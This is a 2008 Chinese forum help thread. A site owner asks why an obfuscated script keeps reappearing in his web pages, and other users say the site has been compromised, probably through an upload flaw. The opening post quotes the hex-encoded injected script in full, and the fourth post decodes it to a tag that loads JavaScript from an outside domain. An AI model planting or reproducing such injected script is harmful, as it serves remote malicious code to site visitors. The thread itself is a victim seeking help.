打印

[求助] 网页被加入代码,是被挂马了吗?

npngstudio

青铜长老

Rank: 4

UID: 142203
帖子: 26
精华: 0
积分: 391
菊花元: 391 元
威望: 0 点
阅读权限: 30
来自: 保定
在线时间: 20 小时
注册时间: 2006-12-28
最后登录: 2008-10-8

顶楼大中小发表于 2008-3-6 13:35 只看该作者

网页被加入代码,是被挂马了吗?

前段时间网站的很多网页被加入了以下代码:
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
而且你把代码删除之后再改了所有密码还是会被加上那些代码.现在随便复制中间的一段代码在百度搜下简直太多了,网站的说明全变成了那段代码,其中的原因真的搞不懂,希望得到高手的帮助,感激不尽!!!

[ 本帖最后由 npngstudio 于 2008-3-6 14:25 编辑 ]

搜索更多相关主题的帖子: 网页百度代码 document writeln

http://www.npng.cn

TOP

一丝不挂

白金长老

Rank: 6 Rank: 6

UID: 153210
帖子: 321
精华: 0
积分: 1818
菊花元: 1818 元
威望: 0 点
阅读权限: 50
在线时间: 47 小时
注册时间: 2007-6-19
最后登录: 2008-9-15

2楼大中小发表于 2008-3-6 14:12 只看该作者

给出具体地址？

诸上座终日著衣吃饭,未曾咬着一粒米,未曾挂着一缕丝

TOP

npngstudio

青铜长老

Rank: 4

UID: 142203
帖子: 26
精华: 0
积分: 391
菊花元: 391 元
威望: 0 点
阅读权限: 30
来自: 保定
在线时间: 20 小时
注册时间: 2006-12-28
最后登录: 2008-10-8

3楼大中小发表于 2008-3-6 14:19 只看该作者

现在没有了上次清除代码后就一直没事我害怕再出事想知道原因在哪

http://www.jiahaowenhua.com

http://www.npng.cn

TOP

icebug

黄金长老

Rank: 5 Rank: 5

UID: 157550
帖子: 695
精华: 0
积分: 1210
菊花元: 1210 元
威望: 0 点
阅读权限: 40
在线时间: 210 小时
注册时间: 2007-9-9
最后登录: 2008-9-25

4楼大中小发表于 2008-3-6 15:26 只看该作者

解密之后应该是这样的:
<script>document.writeln("<script src=http://OffIce.FAQServ.CoM/FAQ.js></script>");</script>

我要做白骨精!
白领骨干精英

TOP

icebug

黄金长老

Rank: 5 Rank: 5

UID: 157550
帖子: 695
精华: 0
积分: 1210
菊花元: 1210 元
威望: 0 点
阅读权限: 40
在线时间: 210 小时
注册时间: 2007-9-9
最后登录: 2008-9-25

5楼大中小发表于 2008-3-6 15:27 只看该作者

看了下那个JS里的内容服务器的确被挂马了

我要做白骨精!
白领骨干精英

TOP

fengxiaoxiao

潇潇

白金长老

Rank: 6 Rank: 6

蓝色火焰

UID: 170572
帖子: 2052
精华: 0
积分: 2574
菊花元: 2524 元
威望: 1 点
阅读权限: 50
在线时间: 288 小时
注册时间: 2008-1-20
最后登录: 2008-10-11

6楼大中小发表于 2008-3-6 15:46 只看该作者

有点明白了
呵呵
好久没看代码了

做个快乐的自己。

TOP

npngstudio

青铜长老

Rank: 4

UID: 142203
帖子: 26
精华: 0
积分: 391
菊花元: 391 元
威望: 0 点
阅读权限: 30
来自: 保定
在线时间: 20 小时
注册时间: 2006-12-28
最后登录: 2008-10-8

7楼大中小发表于 2008-3-6 16:19 只看该作者

是网站有漏洞吗?还是服务器有漏洞?

http://www.npng.cn

TOP

icebug

黄金长老

Rank: 5 Rank: 5

UID: 157550
帖子: 695
精华: 0
积分: 1210
菊花元: 1210 元
威望: 0 点
阅读权限: 40
在线时间: 210 小时
注册时间: 2007-9-9
最后登录: 2008-9-25

8楼大中小发表于 2008-3-6 16:43 只看该作者

具体怎么做的我也不知道能肯定的是网站被黑了
大多数情况是WEB的漏洞也不排除服务器

我要做白骨精!
白领骨干精英

TOP

npngstudio

青铜长老

Rank: 4

UID: 142203
帖子: 26
精华: 0
积分: 391
菊花元: 391 元
威望: 0 点
阅读权限: 30
来自: 保定
在线时间: 20 小时
注册时间: 2006-12-28
最后登录: 2008-10-8

9楼大中小发表于 2008-3-6 17:51 只看该作者

那就麻了烦了......唉

http://www.npng.cn

TOP

modernsky

版主

Rank: 9 Rank: 9 Rank: 9

UID: 156832
帖子: 1982
精华: 0
积分: 2991
菊花元: 2991 元
威望: 0 点
阅读权限: 100
在线时间: 161 小时
注册时间: 2007-6-20
最后登录: 2008-10-13

10楼 大中小发表于 2008-3-9 15:39 只看该作者

TOP

npngstudio

青铜长老

Rank: 4

UID: 142203
帖子: 26
精华: 0
积分: 391
菊花元: 391 元
威望: 0 点
阅读权限: 30
来自: 保定
在线时间: 20 小时
注册时间: 2006-12-28
最后登录: 2008-10-8

11楼 大中小发表于 2008-3-10 15:36 只看该作者

引用:

原帖由 modernsky 于 2008-3-9 15:39 发表
document.writeln("");
这样看确实是被挂马了阿你看看后台有什么漏洞没有比如说ｕｐｆｉｌｅ这样文件经常被人家利用

怎么查看网站有没有漏洞?这方面我不是很懂,有具体的操作方法吗?

http://www.npng.cn

TOP

npngstudio

青铜长老

Rank: 4

UID: 142203
帖子: 26
精华: 0
积分: 391
菊花元: 391 元
威望: 0 点
阅读权限: 30
来自: 保定
在线时间: 20 小时
注册时间: 2006-12-28
最后登录: 2008-10-8

12楼 大中小发表于 2008-3-13 13:37 只看该作者

今天又被加入代码了

:mad:

http://www.npng.cn

TOP

hyboat

社区常客

Rank: 1

UID: 166600
帖子: 20
精华: 0
积分: 20
菊花元: 20 元
威望: 0 点
阅读权限: 10
在线时间: 5 小时
注册时间: 2008-1-4
最后登录: 2008-6-30

13楼 大中小发表于 2008-3-14 17:14 只看该作者

请问是如何解密的?

TOP

whleslie

社区居民

Rank: 2

UID: 147815
帖子: 7
精华: 0
积分: 107
菊花元: 107 元
威望: 0 点
阅读权限: 15
在线时间: 1 小时
注册时间: 2007-3-20
最后登录: 2008-4-10

14楼 大中小发表于 2008-4-10 15:43 只看该作者

把上传的功能去掉,包你没事

厦门酒店
厦门一日游

TOP

ruyaner

普通长老

Rank: 3 Rank: 3

UID: 174437
帖子: 45
精华: 0
积分: 179
菊花元: 179 元
威望: 0 点
阅读权限: 20
在线时间: 17 小时
注册时间: 2008-4-10
最后登录: 2008-7-16

15楼 大中小发表于 2008-4-30 16:02 只看该作者

路过

TOP